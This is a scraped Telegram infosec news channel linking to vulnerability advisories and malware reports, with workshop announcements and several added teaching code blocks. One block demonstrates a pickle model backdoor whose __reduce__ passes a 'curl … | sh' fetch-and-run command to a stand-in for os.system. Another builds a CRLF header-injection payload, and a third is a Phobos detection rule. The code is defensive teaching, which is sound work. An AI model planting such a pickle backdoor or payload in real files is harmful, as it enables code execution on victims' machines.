sysadm_in_channel | Technology

Telegram channel sysadm_in_channel - Sys-Admin InfoSec

News on cybersecurity / information security, information technology, data leaks / breaches, CVEs, hacks, tools and trainings. * Multilingual (En, Ru). * Forum - forum.sys-adm.in * Chat - @sysadm_in * Jobs - @sysadm_in_job * ? - @sysadminkz

Subscribe to the channel

Sys-Admin InfoSec

/ Out of the shadows – ’darcula’ iMessage and RCS smishing attacks target USPS and global postal services

https://www.netcraft.com/blog/darcula-smishing-attacks-target-usps-and-global-postal-services/

Sys-Admin InfoSec

/ Alert: PROXYLIB and LumiApps Transform Mobile Devices into Proxy Nodes

Residential proxies are frequently used by threat actors to conceal malicious activity, including advertising fraud and the use of bots. Access to residential proxy networks is often purchased from other threat actors who create them through enrolling unwitting users’ devices as nodes in the network through malware embedded in mobile, CTV or desktop applications...

How a VPN app can turn your device into a malicious proxy node:

https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-proxylib-and-lumiapps-transform-mobile-devices-into-proxy-nodes

Sys-Admin InfoSec

/ ZenHammer: Rowhammer Attacks on AMD Zen-based Platforms

https://comsec.ethz.ch/research/dram/zenhammer/

Sys-Admin InfoSec

/ AWS one-click account takeover vulnerability...

..a one-click account takeover vulnerability in the Amazon Managed Workflows for Apache Airflow (MWAA) service that could have allowed full takeover of a victim's Airflow web management panel:

https://www.tenable.com/blog/flowfixation-aws-apache-airflow-service-takeover-vulnerability-and-why-neglecting-guardrails

Sys-Admin InfoSec

/ SQLi (SQL Injection) in the org.postgresql:postgresql dependency of Bamboo Data Center and Server

This Critical-severity vulnerability in the org.postgresql:postgresql dependency was introduced in versions 8.2.1, 9.0.0, 9.1.0, 9.2.1, 9.3.0, 9.4.0, and 9.5.0 of Bamboo Data Center and Server.

https://jira.atlassian.com/browse/BAM-25716

Sys-Admin InfoSec

/ Interesting multi-stage StopCrypt ransomware variant propagating in the wild

* with antivirus bypass

https://blog.sonicwall.com/en-us/2024/03/new-multi-stage-stopcrypt-ransomware/

Sys-Admin InfoSec

/ DarkGate Operators Exploit Microsoft Windows SmartScreen Bypass in Zero-Day Campaign

https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html

Sys-Admin InfoSec

/ FortiOS & FortiProxy - Out-of-bounds Write in captive portal

..may allow an inside attacker who has access to the captive portal to execute arbitrary code or commands via specially crafted HTTP requests:

https://www.fortiguard.com/psirt/FG-IR-23-328

Sys-Admin InfoSec

📢 Integration of OpenBLD.net with URLhaus by abuse.ch

URLhaus is a project operated by abuse.ch. Its purpose is to collect, track, and share malware URLs, aiding network administrators and security analysts in safeguarding their networks and customers from cyber threats.

Now you can check whether a malicious domain is blocked by OpenBLD.net, alongside Quad9, AdGuard, Cloudflare and ProtonDNS, directly on abuse.ch.

In addition, you can incorporate abuse.ch lists into your security solutions, just as OpenBLD.net does.

You can check this as example on:
🔹 https://urlhaus.abuse.ch/host/dukeenergyltd.top

Here's to security for us all. Cheers!)
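As an added example (not OpenBLD.net's or abuse.ch's code) of what "incorporating abuse.ch lists into your security solutions" looks like in practice: load a URLhaus host list into a resolver-style blocklist, check lookups against it with parent-domain matching (a DNS blocklist sinks the whole subtree under a listed name), and emit the records an RPZ-capable resolver would consume. The sample lines are constructed for this example in the hosts-file layout of the URLhaus hostfile export ('#' comment lines, then an IP, whitespace and a hostname); dukeenergyltd.top is the host from the link above, the other two names are placeholders.

```python
"""Added example, not OpenBLD.net's or abuse.ch's code: URLhaus host list ->
blocklist -> lookup check and RPZ records. Sample data is constructed."""

SAMPLE_HOSTFILE = """\
# URLhaus hostfile (constructed sample for this example)
# Last updated: 2024-03-01
127.0.0.1\tdukeenergyltd.top
127.0.0.1\tmalware-dl.example.net
127.0.0.1\tcdn.bad.example.org
"""


def parse_hostfile(text):
    """Return the set of listed hostnames, lowercased, without trailing dots."""
    blocked = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 2:          # malformed line: skip rather than block "127.0.0.1"
            continue
        blocked.add(parts[1].lower().rstrip("."))
    return blocked


def is_blocked(hostname, blocked):
    """True if the name itself or any parent domain is listed."""
    labels = hostname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocked for i in range(len(labels)))


def to_rpz(blocked):
    """Response Policy Zone records: the listed name and its whole subtree
    answer NXDOMAIN (CNAME to the root is the RPZ idiom for that)."""
    lines = []
    for name in sorted(blocked):
        lines.append(f"{name} CNAME .")
        lines.append(f"*.{name} CNAME .")
    return "\n".join(lines)


if __name__ == "__main__":
    blocked = parse_hostfile(SAMPLE_HOSTFILE)
    for q in ("dukeenergyltd.top", "www.dukeenergyltd.top", "example.com"):
        print(q, "blocked" if is_blocked(q, blocked) else "ok")
    print(to_rpz(blocked))
```

Parent-domain matching is deliberate: listing `dukeenergyltd.top` should also stop `cdn.dukeenergyltd.top`, which is what the wildcard RPZ record expresses on the resolver side. The reverse does not hold, so a list entry for `cdn.bad.example.org` leaves `bad.example.org` untouched.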

Sys-Admin InfoSec

📢 Open DevOps workshop by Rebrain: HTTPS in Nginx and Angie

Time:

• 12 March (Tuesday) 19:00 MSK

Program:

• TLS and HTTPS fundamentals
• Obtaining free certificates
• Automating certificate renewal
• Configuring fast and secure HTTPS for a site

Details

Host:

Nikolay Lavlinsky – web developer with 15+ years of experience. Speaker at HighLoad++ and RIT++. Specialization: website and web application performance.

Sys-Admin InfoSec

/ WogRAT malware exploits aNotepad (Windows, Linux)

AhnLab Security Intelligence Center (ASEC) has recently discovered backdoor malware being distributed via aNotepad, a free online notepad platform. The malware comes in both the PE format targeting Windows and the ELF format targeting Linux. Because the threat actor used the string 'WingOfGod' during development, it is classified as WogRAT:

https://asec.ahnlab.com/en/62446/

Sys-Admin InfoSec

/ VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability (Critical)

A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host:

https://www.vmware.com/security/advisories/VMSA-2024-0006.html

Sys-Admin InfoSec

/ 0-Click Account Takeover on Facebook

https://infosecwriteups.com/0-click-account-takeover-on-facebook-e4120651e23e

Sys-Admin InfoSec

📢 Open Linux workshop by Rebrain: LVM, part one

Time:

• 6 March (Wednesday) 20:00 MSK

Program:

• From logical partitions to logical volumes
• PV, VG, LV
• Hands-on LVM: creating an LV, managing free space

Details

Host:

Andrey Buranov – system administrator in the VK Play department. 10+ years of experience with Linux.

Sys-Admin InfoSec

📢 AppSecFest announces its CFP 🚀

AppSecFest 2024 is tentatively scheduled for around 3 May in Almaty and will be split into several zones:

🔹 App Zone: software development trends (mobile, web, blockchain, microservices, etc.), Dev and DevOps trends, AI/ML in the SDLC.
🔹 Sec Zone: current application security (SAST, SCA, DAST, RASP; API, IaC and container security; ASTO, WAF, IAST, MAST, secrets management), attack vectors and vulnerability management.

Speakers wanted! Are you an App/Sec specialist? Then welcome to the CFP:
🔹 https://forms.gle/EBAAArtHtoCmSMri7

Sys-Admin InfoSec

📢 Open workshop: Cross-team interaction - learning to get along

Time:

• 2 April (Tuesday) 19:00 MSK

Program:

• Prerequisites for building or changing an interaction process
• Building the interaction process between the DEV, QA and DevOps teams when you are a single service
• Building the DevOps workflow with OPS/support

Details

Host:

Alexander Krylov – 7+ years in DevOps. Conference speaker: DevOps conf, TeamLead conf, Highload conf. Author of the Haproxy course at Rebrain.

Sys-Admin InfoSec

/ The latest emerging C2 was primarily focused on ASUS devices and grew to over 6,000 bots within 72 hours.

ASUS routers under attack:

https://blog.lumen.com/the-darkside-of-themoon/

Sys-Admin InfoSec

/ GoFetch is a microarchitectural side-channel attack that can extract secret keys from constant-time cryptographic implementations via data memory-dependent prefetchers (DMPs).

https://gofetch.fail/

Sys-Admin InfoSec

📢 Open DevOps workshop by Rebrain: How an engineer survives a flood of calls

Time:

• 26 March (Tuesday) 19:00 MSK

Program:

• Approaches to time optimization
• The flow framework
• The capsule approach to calendar management
• Toolset

Registration

Host:

Alexander Krylov – 7+ years in DevOps. Conference speaker: DevOps conf, TeamLead conf, Highload conf. Author of the Haproxy course at Rebrain.

Sys-Admin InfoSec

/ UDP-based application-layer protocol implementations are vulnerable to network loops

..An unauthenticated attacker can send maliciously crafted packets to a vulnerable UDP-based implementation of an application protocol (e.g., DNS, NTP, TFTP), leading to denial of service (DoS) and/or resource abuse. Because UDP has no handshake, a single packet with a spoofed source address can make two servers that answer every unexpected datagram with an error reply bounce those errors at each other indefinitely:

https://kb.cert.org/vuls/id/417980
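An added example, not from the CERT/CC note, that models the loop in memory: two servers running the same handler, an attacker's datagram delivered to B with its source forged to be A, and a hardened handler that applies the classic fix of never answering a message that is itself an error. Server names, payloads and the step limit are constructed for the simulation.

```python
"""Added example, not from the CERT/CC note: an in-memory model of the
application-layer UDP loop and of the handler fix that breaks it."""
from collections import deque

ERROR = b"ERR unknown request"


def vulnerable_handler(payload):
    """Replies to everything, including error messages from its peers."""
    return b"PONG" if payload == b"PING" else ERROR


def hardened_handler(payload):
    """Drops error messages silently, so there is nothing to bounce back."""
    if payload == b"PING":
        return b"PONG"
    if payload.startswith(b"ERR"):
        return None
    return ERROR


def simulate(handler, first_datagram, max_steps=1000):
    """Deliver one datagram (src, dst, payload) and let servers A and B react
    until the network is quiet or max_steps datagrams have been processed.
    Returns (datagrams_processed, still_looping)."""
    servers = {"A": handler, "B": handler}
    queue = deque([first_datagram])
    steps = 0
    while queue and steps < max_steps:
        src, dst, payload = queue.popleft()
        steps += 1
        if dst not in servers:          # delivered to an ordinary client, not bounced
            continue
        reply = servers[dst](payload)
        if reply is not None:
            queue.append((dst, src, reply))   # UDP: the answer goes to whatever src claimed
    return steps, bool(queue)


SPOOFED = ("A", "B", b"HELLO")     # attacker's packet, source forged as server A
LEGIT = ("client", "A", b"PING")   # normal traffic for comparison

if __name__ == "__main__":
    print("vulnerable, spoofed:", simulate(vulnerable_handler, SPOOFED))
    print("hardened,   spoofed:", simulate(hardened_handler, SPOOFED))
    print("vulnerable, legit:  ", simulate(vulnerable_handler, LEGIT))
```

With the vulnerable handler the exchange never ends (the simulation stops only at the step limit); with the hardened one it dies after B's single error reply. The handler change is the fix at the application layer; ingress filtering of spoofed source addresses (BCP 38) at the network edge and per-source rate limiting on the service are the complementary controls, since the injected packet must claim to come from the peer server in the first place.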

Sys-Admin InfoSec

/ What a Cluster: Local Volumes Vulnerability in Kubernetes

https://www.akamai.com/blog/security-research/kubernetes-local-volumes-command-injection-vulnerability-rce-system-privileges

Sys-Admin InfoSec

📢 Open workshop: Choosing a MySQL fork, from Oracle to MariaDB

Time:

• 19 March (Tuesday) 19:00 MSK

Program:

• Overview of open forks in the MySQL ecosystem
• Oracle MySQL
• Percona Server for MySQL
• MariaDB
• Compatibility and migration options
• Feature comparison

Details

Host:

Nikolay Lavlinsky – web developer with 15+ years of experience. Speaker at HighLoad++ and RIT++. Specialization: website and web application performance.

Sys-Admin InfoSec

/ Magnet Goblin targets publicly facing servers using 1-day vulnerabilities

https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/

Sys-Admin InfoSec

/ Cisco Secure Client carriage return line feed injection vulnerability (High)

Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7
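An added, generic illustration of the vulnerability class (not Cisco's code and not the Secure Client bug itself): an attacker-controlled value pasted into an HTTP response header, where an encoded CR/LF pair lets the attacker append a header of their own, beside the check that rejects it. The redirect parameter and the attacker's input are constructed for the example.

```python
"""Added example, generic rather than Cisco's code: CRLF injection into an HTTP
response header, and the input check that prevents it."""
from urllib.parse import unquote


def build_redirect_vulnerable(target):
    """Builds a 302 by pasting the target straight into the header block."""
    return ("HTTP/1.1 302 Found\r\n"
            f"Location: {target}\r\n"
            "Content-Length: 0\r\n\r\n")


def build_redirect_hardened(target):
    """Same response, but a CR or LF in the value is rejected outright
    (stripping is the other common choice; rejecting is easier to audit)."""
    if "\r" in target or "\n" in target:
        raise ValueError("CR/LF in header value")
    return build_redirect_vulnerable(target)


def parse_response(raw):
    """Minimal client-side parse: status line and a header dict."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(": ")
        headers[name] = value
    return status, headers


# What arrives in the redirect parameter: a legitimate URL, then %0d%0a (CR LF)
# and a header of the attacker's choosing. The server URL-decodes it before use.
ATTACK_ENCODED = "https://example.com/%0d%0aSet-Cookie:%20session=attacker-chosen"
ATTACK = unquote(ATTACK_ENCODED)

if __name__ == "__main__":
    print(parse_response(build_redirect_vulnerable(ATTACK)))
    try:
        build_redirect_hardened(ATTACK)
    except ValueError as e:
        print("rejected:", e)
```

The parsed result of the vulnerable builder contains a `Set-Cookie` header the server never intended to send, which is the whole attack: the client cannot tell an injected header from a real one. Header-building APIs in mature frameworks already refuse CR/LF in values; the check matters when code assembles headers by string concatenation.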

Sys-Admin InfoSec

/ Spinning YARN - a new Linux malware campaign targets Docker, Apache Hadoop, Redis and Confluence

Cado Security Labs researchers have recently encountered an emerging malware campaign targeting misconfigured servers running the following web-facing services:

- Apache Hadoop YARN,
- Docker,
- Confluence and
- Redis

Detailed research - Details

Sys-Admin InfoSec

/ Apple patches iOS 17.4 and iPadOS 17.4

Impact: An app may be able to read sensitive location information:

https://support.apple.com/en-us/HT214081

Sys-Admin InfoSec

😡 OpenBLD.net - Phobos ransomware attack mitigations

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024...

Phobos actors run executables like 1saas.exe or cmd.exe to deploy additional Phobos payloads with elevated privileges. They can also use the same commands to perform various Windows shell functions. The Windows command shell lets threat actors control many aspects of a system, with different permission levels required for different subsets of commands.

How to mitigate the risk:
- Secure RDP
- Reduce the scope of administrative privileges
- Use OpenBLD.net or similar services

Technical details on the CISA site:
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a
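An added example, not from the CISA advisory or OpenBLD.net, of turning the behaviour described above into a detection over process-creation events. Field names follow Sysmon Event ID 1 (Image, ParentImage, IntegrityLevel, CommandLine); the events are constructed, not real telemetry. Rule 1 keys on the executable name the advisory mentions (1saas.exe). Rule 2, an elevated cmd.exe whose parent lives in a user-writable path, is my own heuristic and an assumption, not an indicator from the advisory.

```python
"""Added example, not CISA's or OpenBLD.net's code: a small detection over
constructed Sysmon-style process-creation events for Phobos-like staging."""
import ntpath

PHOBOS_IMAGES = {"1saas.exe"}                                   # named in the advisory
ELEVATED = {"High", "System"}                                   # Sysmon IntegrityLevel values
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")   # assumption for rule 2

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium", "CommandLine": "cmd.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\1saas.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "IntegrityLevel": "High", "CommandLine": "1saas.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\bob\Downloads\invoice.exe",
     "IntegrityLevel": "High", "CommandLine": "cmd.exe /c start stage2.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "IntegrityLevel": "System", "CommandLine": "cmd.exe /c backup.bat"},
]


def detect(event):
    """Return the rule names the event triggers (empty list = nothing to see)."""
    hits = []
    image = ntpath.basename(event["Image"]).lower()
    parent = event["ParentImage"].lower()
    if image in PHOBOS_IMAGES:
        hits.append("phobos_known_executable")
    if (image == "cmd.exe" and event["IntegrityLevel"] in ELEVATED
            and any(marker in parent for marker in USER_WRITABLE)):
        hits.append("elevated_cmd_from_user_writable_parent")
    return hits


def scan(events):
    """(index, hits) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"], hits)
```

The last sample event (an elevated cmd.exe spawned by services.exe from System32) is deliberately not flagged: scheduled maintenance scripts look exactly like that, and a rule that fires on every elevated shell is noise. Rule 2 earns its keep by combining the privilege level with where the parent binary came from.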

Sys-Admin InfoSec

/ Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor

How can loading an ML model lead to payload code execution? Analysis:

https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/
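An added example, not code from the JFrog post or from Hugging Face, answering the question above for the usual vector: Python pickle. A pickle stream is a program for a small stack machine, and one of its opcodes means "import module.name and call it with these arguments"; PyTorch's default .bin/.pt checkpoints are pickle archives, so a model file can carry a call to os.system that runs the moment it is loaded. The block shows a backdoored object, the naive load that executes it, an opcode scan that lists the imports a file would make without running it, and an allowlisting unpickler that refuses them. The payload() function is a stand-in for os.system so nothing dangerous actually runs, the C2 URL is a placeholder, and the allowlist contents are an assumption.

```python
"""Added example, not JFrog's or Hugging Face's code: why loading a pickle-based
model executes code, plus a static opcode scan and an allowlisting loader."""
import io
import pickle
import pickletools

PAYLOAD_LOG = []  # records what the "payload" was asked to run


def payload(cmd):
    """Stand-in for os.system: a real backdoor would execute cmd here."""
    PAYLOAD_LOG.append(cmd)
    return 0


class BackdooredModel:
    """Looks like a model, but __reduce__ tells pickle how to rebuild it:
    call payload("curl ...") and use the return value as the object."""

    def __init__(self, weights):
        self.weights = weights

    def __reduce__(self):
        return (payload, ("curl http://c2.invalid/x | sh",))  # placeholder, not a real C2


def build_malicious_blob():
    return pickle.dumps({"state_dict": BackdooredModel([0.1, 0.2])})


def build_benign_blob():
    return pickle.dumps({"w": [1.0, 2.0]})


def demo_naive_load(blob=None):
    """What pickle.load / torch.load(..., weights_only=False) does: runs the
    callable named in the stream. Returns the commands the payload received."""
    PAYLOAD_LOG.clear()
    pickle.loads(blob if blob is not None else build_malicious_blob())
    return list(PAYLOAD_LOG)


def list_globals(blob):
    """Static scan: every module.name the stream would import, found by walking
    opcodes with pickletools.genops. Only the string and memo operands that
    GLOBAL / STACK_GLOBAL consume are tracked; nothing is executed."""
    refs, stack, memo = set(), [], {}
    string_ops = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
                  "STRING", "BINSTRING", "SHORT_BINSTRING"}
    for op, arg, _pos in pickletools.genops(blob):
        if op.name in string_ops:
            stack.append(arg)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = stack[-1] if stack else None
        elif op.name in {"BINPUT", "LONG_BINPUT", "PUT"}:
            memo[arg] = stack[-1] if stack else None
        elif op.name in {"BINGET", "LONG_BINGET", "GET"}:
            stack.append(memo.get(arg))
        elif op.name == "GLOBAL":            # protocol <= 3: "module name" in one operand
            refs.add(".".join(arg.split(" ", 1)))
            stack.append(None)
        elif op.name == "STACK_GLOBAL":      # protocol 4+: module and name come from the stack
            name, module = stack.pop(), stack.pop()
            refs.add(f"{module}.{name}")
            stack.append(None)
        else:
            stack.append(None)               # any other value; keeps MEMOIZE aligned
    return refs


class AllowlistUnpickler(pickle.Unpickler):
    """Refuses every global except an explicit allowlist. The allowlist below is an
    assumption for the example; a weights-only loader lists exactly the tensor
    and container types it needs and nothing else."""
    ALLOWED = {("collections", "OrderedDict"), ("builtins", "set")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"refusing to import {module}.{name}")
        return super().find_class(module, name)


def safe_load(blob):
    return AllowlistUnpickler(io.BytesIO(blob)).load()


if __name__ == "__main__":
    blob = build_malicious_blob()
    print("imports the file would make:", list_globals(blob))
    print("naive load ran:", demo_naive_load(blob))
    try:
        safe_load(blob)
    except pickle.UnpicklingError as e:
        print("allowlist loader:", e)
```

The scan is the cheap pre-download check: a weights file has no business importing anything outside tensor and container types, so any other module.name is a red flag before a single byte is deserialized. The allowlisting unpickler is the runtime backstop. Formats that carry no code at all (safetensors) avoid the problem entirely and are the better default where the framework supports them.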

Sys-Admin InfoSec

/ XSS Vulnerability in LiteSpeed Cache Plugin Affecting 4+ Million Sites

The plugin LiteSpeed Cache (free version), which has over 4 million active installations, is known as the most popular caching plugin in WordPress.

This plugin suffers from an unauthenticated, site-wide stored XSS vulnerability that could let any unauthenticated user do anything from stealing sensitive information to, in this case, escalating privileges on the WordPress site with a single HTTP request.

https://patchstack.com/articles/xss-vulnerability-in-litespeed-cache-plugin-affecting-4-million-sites/

Читать полностью…

Sys-Admin InfoSec

/ Announcing bpftop: Streamlining eBPF performance optimization

https://netflixtechblog.com/announcing-bpftop-streamlining-ebpf-performance-optimization-6a727c1ae2e5
